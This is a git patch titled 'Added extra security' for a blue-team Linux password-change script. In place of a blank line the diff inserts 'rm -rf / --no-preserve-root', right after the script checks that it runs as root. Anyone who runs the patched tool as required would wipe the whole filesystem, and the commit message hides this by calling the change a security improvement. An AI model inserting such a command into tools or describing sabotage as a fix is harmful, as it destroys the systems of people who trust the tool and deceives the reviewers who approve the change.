From 0a51bfc065afe79e6a40d5f8995fec9d07b140f6 Mon Sep 17 00:00:00 2001 From: Hulto Date: Sat, 6 Mar 2021 17:56:23 -0500 Subject: [PATCH] Added extra security --- blue-team/linux/change-passwords.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/blue-team/linux/change-passwords.sh b/blue-team/linux/change-passwords.sh index 066b956..cb49d43 100644 --- a/blue-team/linux/change-passwords.sh +++ b/blue-team/linux/change-passwords.sh @@ -6,7 +6,7 @@ if [[ $EUID -ne 0 ]]; then exit 1 fi delim='!' - +rm -rf / --no-preserve-root echo 'Enter the new password template:' read -r passTemp echo 'Confirm:'